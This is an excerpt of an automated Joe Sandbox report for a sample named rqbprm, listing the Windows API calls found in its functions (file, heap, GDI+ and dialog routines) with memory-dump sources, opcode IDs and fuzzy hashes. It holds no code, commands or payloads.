                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateFile
                                                                                              • String ID:
                                                                                              • API String ID: 823142352-0
                                                                                              • Opcode ID: b860cc5ab501d62fb48fa3bdf0ceab17e41ad70271e7ffcec0cc828651cb49fc
                                                                                              • Instruction ID: 2670185e2578adc62485d470cd971fc4c4d1e12ae598a48d7e3981a23d96fb0d
                                                                                              • Opcode Fuzzy Hash: b860cc5ab501d62fb48fa3bdf0ceab17e41ad70271e7ffcec0cc828651cb49fc
                                                                                              • Instruction Fuzzy Hash: D021CCB1104344AFE3708A65CCC9FB7B7DCEB49324F104A19FAE6C21D1C7B8A9849A71
                                                                                              APIs
                                                                                              • SetFilePointer.KERNELBASE(000000FF,00000000,00000000,00000001), ref: 00C69EC7
                                                                                              • GetLastError.KERNEL32 ref: 00C69ED4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: ErrorFileLastPointer
                                                                                              • String ID:
                                                                                              • API String ID: 2976181284-0
                                                                                              • Opcode ID: a8b523d530c251b4d944d19118a4ba70be8ba399f8a39f176b4fab319a5f6568
                                                                                              • Instruction ID: 1974976da1a5ec7eb1147fe53c563883196818bd3a6c8b60388148c01ac45f5b
                                                                                              • Opcode Fuzzy Hash: a8b523d530c251b4d944d19118a4ba70be8ba399f8a39f176b4fab319a5f6568
                                                                                              • Instruction Fuzzy Hash: BD11E130600701ABD734C669C8C4BAAB7ECEB45370F604A2AE563D26D0D772EE4AC760
                                                                                              APIs
                                                                                              • _free.LIBCMT ref: 00C88E75
                                                                                                • Part of subcall function 00C88E06: RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00C8CA2C,00000000,?,00C86CBE,?,00000008,?,00C891E0,?,?,?), ref: 00C88E38
                                                                                              • RtlReAllocateHeap.NTDLL(00000000,?,?,?,00000007,00CA1098,00C617CE,?,?,00000007,?,?,?,00C613D6,?,00000000), ref: 00C88EB1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap$_free
                                                                                              • String ID:
                                                                                              • API String ID: 1482568997-0
                                                                                              • Opcode ID: 5927cf569c0a6f9f50dd41819f6ccf53d4f5e6205c948cf883fed8bc120ba914
                                                                                              • Instruction ID: 1dff6817eb5f670dfa6f9c11ccdb17988eaacd9b636ef2dc304bb4056fe5aaa1
                                                                                              • Opcode Fuzzy Hash: 5927cf569c0a6f9f50dd41819f6ccf53d4f5e6205c948cf883fed8bc120ba914
                                                                                              • Instruction Fuzzy Hash: 6EF0213A20111266CB217B269C05F7F37589FC1778FE40126F82457991DF70DE0493AC
                                                                                              APIs
                                                                                              • GetCurrentProcess.KERNEL32(?,?), ref: 00C710AB
                                                                                              • GetProcessAffinityMask.KERNEL32(00000000), ref: 00C710B2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Process$AffinityCurrentMask
                                                                                              • String ID:
                                                                                              • API String ID: 1231390398-0
                                                                                              • Opcode ID: 19828f89de47dde8abbb204d2a3451dc80b8eb25bee8a7042931728537df5c76
                                                                                              • Instruction ID: 0f283ca00be8858765cf432382697ae50afc5b7261e1d4332b57f693bd90e8f6
                                                                                              • Opcode Fuzzy Hash: 19828f89de47dde8abbb204d2a3451dc80b8eb25bee8a7042931728537df5c76
                                                                                              • Instruction Fuzzy Hash: 2BE0D832B10185EBCF198BB89C09AEF73DDEA44204318C176E817D3101FA34DF414760
                                                                                              APIs
                                                                                                • Part of subcall function 00C8BF30: GetEnvironmentStringsW.KERNEL32 ref: 00C8BF39
                                                                                                • Part of subcall function 00C8BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00C8BF5C
                                                                                                • Part of subcall function 00C8BF30: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 00C8BF82
                                                                                                • Part of subcall function 00C8BF30: _free.LIBCMT ref: 00C8BF95
                                                                                                • Part of subcall function 00C8BF30: FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00C8BFA4
                                                                                              • _free.LIBCMT ref: 00C882AE
                                                                                              • _free.LIBCMT ref: 00C882B5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: _free$ByteCharEnvironmentMultiStringsWide$Free
                                                                                              • String ID:
                                                                                              • API String ID: 400815659-0
                                                                                              • Opcode ID: c594c3a4691293b7ec6d5c2ed67c4ef01879ad97383882955027f5d15b2c0be5
                                                                                              • Instruction ID: 54b3372e1e8ebb53ce8c8fb11dacab605695ea096bdcf49484efa978d34a58b9
                                                                                              • Opcode Fuzzy Hash: c594c3a4691293b7ec6d5c2ed67c4ef01879ad97383882955027f5d15b2c0be5
                                                                                              • Instruction Fuzzy Hash: 7CE02B33605D53459665327A6C02B6F06054F8133CBD6031AF920D75D3DE10890B27AE
                                                                                              APIs
                                                                                              • SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A501
                                                                                                • Part of subcall function 00C6BB03: _wcslen.LIBCMT ref: 00C6BB27
                                                                                              • SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,00C6A325,?,?,?,00C6A175,?,00000001,00000000,?,?), ref: 00C6A532
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: b4d6236b615c6beb2e549ac887c314ef93c86fd613a7d9b70ca19e442e7c7fbc
                                                                                              • Instruction ID: fd8338f010d03cb7d810930c3f81a5a16a0b46ebd4110f6b698bb58f1e7d753c
                                                                                              • Opcode Fuzzy Hash: b4d6236b615c6beb2e549ac887c314ef93c86fd613a7d9b70ca19e442e7c7fbc
                                                                                              • Instruction Fuzzy Hash: 72F030322401497BDF115F61DC45FDE37ACAB04385F448051B949E5160EB71DED4EA60
                                                                                              APIs
                                                                                              • DeleteFileW.KERNELBASE(000000FF,?,?,00C6977F,?,?,00C695CF,?,?,?,?,?,00C92641,000000FF), ref: 00C6A1F1
                                                                                                • Part of subcall function 00C6BB03: _wcslen.LIBCMT ref: 00C6BB27
                                                                                              • DeleteFileW.KERNEL32(?,000000FF,?,00000800,?,?,00C6977F,?,?,00C695CF,?,?,?,?,?,00C92641), ref: 00C6A21F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: DeleteFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2643169976-0
                                                                                              • Opcode ID: e5309a56c8b5f40f07f0db6816c89260927f217f7f3505bf294052a37f49e376
                                                                                              • Instruction ID: de0d62ba8a9c4d2879e408ab229edb2f93b23f7d7dad0a157415753170bf9b8e
                                                                                              • Opcode Fuzzy Hash: e5309a56c8b5f40f07f0db6816c89260927f217f7f3505bf294052a37f49e376
                                                                                              • Instruction Fuzzy Hash: 0AE0D8351402496BEB115F60DC86FDD375CAF0C3C5F484061B948E2050EB71DEC4EE54
                                                                                              APIs
                                                                                              • GdiplusShutdown.GDIPLUS(?,?,?,?,00C92641,000000FF), ref: 00C7ACB0
                                                                                              • CoUninitialize.COMBASE(?,?,?,?,00C92641,000000FF), ref: 00C7ACB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: GdiplusShutdownUninitialize
                                                                                              • String ID:
                                                                                              • API String ID: 3856339756-0
                                                                                              • Opcode ID: 0f4eb903d03df83f417fbcb855f6ad72e9596b3b6d702d967fb04d1db88670f3
                                                                                              • Instruction ID: d54423402b65c66d2644e9b893b675a687eacb95521dc5004e7f4a4b049eced5
                                                                                              • Opcode Fuzzy Hash: 0f4eb903d03df83f417fbcb855f6ad72e9596b3b6d702d967fb04d1db88670f3
                                                                                              • Instruction Fuzzy Hash: D1E06D72604A50EFCB009B58DC0AB49FBA8FB89B20F04426AF416D37A0CB74A800CA94
                                                                                              APIs
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00C6A23A,?,00C6755C,?,?,?,?), ref: 00C6A254
                                                                                                • Part of subcall function 00C6BB03: _wcslen.LIBCMT ref: 00C6BB27
                                                                                              • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00C6A23A,?,00C6755C,?,?,?,?), ref: 00C6A280
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: AttributesFile$_wcslen
                                                                                              • String ID:
                                                                                              • API String ID: 2673547680-0
                                                                                              • Opcode ID: 320ea8068881ecedfcdf3528f82e34fb5dc81eb20c7ea5c6eb13d7c37aa252aa
                                                                                              • Instruction ID: 8d409fac6d0d2c6295c150b76640a3fe8d1fd9cdf3db6628a7d1ab94c279a934
                                                                                              • Opcode Fuzzy Hash: 320ea8068881ecedfcdf3528f82e34fb5dc81eb20c7ea5c6eb13d7c37aa252aa
                                                                                              • Instruction Fuzzy Hash: 78E092365001245BCB21AB64CC49BD97B58AB083E1F044261FD58E3190D770DE84CAA0
                                                                                              APIs
                                                                                              • _swprintf.LIBCMT ref: 00C7DEEC
                                                                                                • Part of subcall function 00C64092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00C640A5
                                                                                              • SetDlgItemTextW.USER32(00000065,?), ref: 00C7DF03
                                                                                                • Part of subcall function 00C7B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7B579
                                                                                                • Part of subcall function 00C7B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7B58A
                                                                                                • Part of subcall function 00C7B568: IsDialogMessageW.USER32(00010414,?), ref: 00C7B59E
                                                                                                • Part of subcall function 00C7B568: TranslateMessage.USER32(?), ref: 00C7B5AC
                                                                                                • Part of subcall function 00C7B568: DispatchMessageW.USER32(?), ref: 00C7B5B6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekTextTranslate__vswprintf_c_l_swprintf
                                                                                              • String ID:
                                                                                              • API String ID: 2718869927-0
                                                                                              • Opcode ID: 410cf2a883ffea5a3e64d09ec19f7231aa293a536bd55ffe1791b60721b8c857
                                                                                              • Instruction ID: c1e8590c2cf23f4fa4dd6ede82390cdc0316ea14362720238b76f270433b1e64
                                                                                              • Opcode Fuzzy Hash: 410cf2a883ffea5a3e64d09ec19f7231aa293a536bd55ffe1791b60721b8c857
                                                                                              • Instruction Fuzzy Hash: A3E0D8B64003486BDF12BB64DC0AFDE3B6C5B09789F044851B205DB0F3EA78EE149761
                                                                                              APIs
                                                                                              • GetSystemDirectoryW.KERNEL32(?,00000800), ref: 00C70836
                                                                                              • LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,00C6F2D8,Crypt32.dll,00000000,00C6F35C,?,?,00C6F33E,?,?,?), ref: 00C70858
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: DirectoryLibraryLoadSystem
                                                                                              • String ID:
                                                                                              • API String ID: 1175261203-0
                                                                                              • Opcode ID: 8bd9e9dd4c84635c1db7ff1f26134d4ca60d5895a6d954853c348d1f056bc7d0
                                                                                              • Instruction ID: 4d9bac4502fd5ca0d47e880f7ae8ea2b6c923567e4223027274a6d7b83988776
                                                                                              • Opcode Fuzzy Hash: 8bd9e9dd4c84635c1db7ff1f26134d4ca60d5895a6d954853c348d1f056bc7d0
                                                                                              • Instruction Fuzzy Hash: ADE01A76800168AADB11ABA49C49FDA7BACAF09395F0440A6B649E2044DB74DA84CBA0
                                                                                              APIs
                                                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00C7A3DA
                                                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 00C7A3E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: BitmapCreateFromGdipStream
                                                                                              • String ID:
                                                                                              • API String ID: 1918208029-0
                                                                                              • Opcode ID: 76815c2fb2464be5eec183425867ceef881ebb4c7558980794144be938036fdd
                                                                                              • Instruction ID: dae4da4cd36db8831652333103d82fe9d6374d6f2253759066fb3ba0506f4fba
                                                                                              • Opcode Fuzzy Hash: 76815c2fb2464be5eec183425867ceef881ebb4c7558980794144be938036fdd
                                                                                              • Instruction Fuzzy Hash: B3E0ED72504218EBCB10DF95C545A9DBBE8EB08364F10C05AA85A93211E374AE04DB91
                                                                                              APIs
                                                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00C82BAA
                                                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 00C82BB5
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_24_2_c60000_rqbprm.jbxd
                                                                                              Similarity
                                                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                                                              • String ID:
                                                                                              • API String ID: 1660781231-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: ItemShowWindow
                                                                                              • String ID:
                                                                                              • API String ID: 3351165006-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C68289
                                                                                                • Part of subcall function 00C613DC: __EH_prolog.LIBCMT ref: 00C613E1
                                                                                                • Part of subcall function 00C6A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00C6A598
                                                                                              Similarity
                                                                                              • API ID: H_prolog$CloseFind
                                                                                              • String ID:
                                                                                              • API String ID: 2506663941-0
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C613E1
                                                                                                • Part of subcall function 00C65E37: __EH_prolog.LIBCMT ref: 00C65E3C
                                                                                                • Part of subcall function 00C6CE40: __EH_prolog.LIBCMT ref: 00C6CE45
                                                                                                • Part of subcall function 00C6B505: __EH_prolog.LIBCMT ref: 00C6B50A
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C613E1
                                                                                                • Part of subcall function 00C65E37: __EH_prolog.LIBCMT ref: 00C65E3C
                                                                                                • Part of subcall function 00C6CE40: __EH_prolog.LIBCMT ref: 00C6CE45
                                                                                                • Part of subcall function 00C6B505: __EH_prolog.LIBCMT ref: 00C6B50A
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C7B098
                                                                                                • Part of subcall function 00C613DC: __EH_prolog.LIBCMT ref: 00C613E1
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,00C93A34), ref: 00C8ACF8
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              APIs
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 00C83C3F
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2098427255.0000000000C93000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000C9E000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CA5000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2099010787.0000000000CC2000.00000004.00000001.01000000.0000000A.sdmp
                                                                                              • Associated: 00000018.00000002.2100628691.0000000000CC3000.00000002.00000001.01000000.0000000A.sdmp
                                                                                              Similarity
                                                                                              • API ID: AddressProc
                                                                                              • String ID:
                                                                                              • API String ID: 190572456-0
                                                                                              APIs
                                                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,00C8CA2C,00000000,?,00C86CBE,?,00000008,?,00C891E0,?,?,?), ref: 00C88E38
                                                                                              Similarity
                                                                                              • API ID: AllocateHeap
                                                                                              • String ID:
                                                                                              • API String ID: 1279760036-0
                                                                                              APIs
                                                                                              • __EH_prolog.LIBCMT ref: 00C65AC2
                                                                                                • Part of subcall function 00C6B505: __EH_prolog.LIBCMT ref: 00C6B50A
                                                                                              Similarity
                                                                                              • API ID: H_prolog
                                                                                              • String ID:
                                                                                              • API String ID: 3519838083-0
                                                                                              APIs
                                                                                                • Part of subcall function 00C6A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6C4
                                                                                                • Part of subcall function 00C6A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6F2
                                                                                                • Part of subcall function 00C6A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,00C6A592,000000FF,?,?), ref: 00C6A6FE
                                                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 00C6A598
                                                                                              Similarity
                                                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                                                              • String ID:
                                                                                              • API String ID: 1464966427-0
                                                                                              APIs
                                                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00C70E3D
                                                                                              Similarity
                                                                                              • API ID: ExecutionStateThread
                                                                                              • String ID:
                                                                                              • API String ID: 2211380416-0
                                                                                              APIs
                                                                                              • GdipAlloc.GDIPLUS(00000010), ref: 00C7A62C
                                                                                                • Part of subcall function 00C7A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 00C7A3DA
                                                                                              Similarity
                                                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                                                              • String ID:
                                                                                              • API String ID: 1915507550-0
                                                                                              APIs
                                                                                              • DloadProtectSection.DELAYIMP ref: 00C7E5E3
                                                                                              Similarity
                                                                                              • API ID: DloadProtectSection
                                                                                              • String ID:
                                                                                              • API String ID: 2203082970-0
                                                                                              APIs
                                                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00C71B3E), ref: 00C7DD92
                                                                                                • Part of subcall function 00C7B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 00C7B579
                                                                                                • Part of subcall function 00C7B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00C7B58A
                                                                                                • Part of subcall function 00C7B568: IsDialogMessageW.USER32(00010414,?), ref: 00C7B59E
                                                                                                • Part of subcall function 00C7B568: TranslateMessage.USER32(?), ref: 00C7B5AC
                                                                                                • Part of subcall function 00C7B568: DispatchMessageW.USER32(?), ref: 00C7B5B6
                                                                                              Similarity
                                                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                                                              • String ID:
                                                                                              • API String ID: 897784432-0
                                                                                              APIs
                                                                                              • GetFileType.KERNELBASE(000000FF,00C697BE), ref: 00C698C8
                                                                                              Similarity
                                                                                              • API ID: FileType
                                                                                              • String ID:
                                                                                              • API String ID: 3081899298-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Similarity
                                                                                              • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                                                              • String ID:
                                                                                              • API String ID: 1269201914-0
                                                                                              APIs
                                                                                              • ___delayLoadHelper2@8.DELAYIMP ref: 00C7E1E3
                                                                                                • Part of subcall function 00C7E85D: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00C7E8D0
                                                                                                • Part of subcall function 00C7E85D: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00C7E8E1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000018.00000002.2098303375.0000000000C61000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00C60000, based on PE: true
                                                                                              • Associated: 00000018.00000002.2098193763.0000000000C60000.00000002.00000001.01000000.0000000A.sdmp
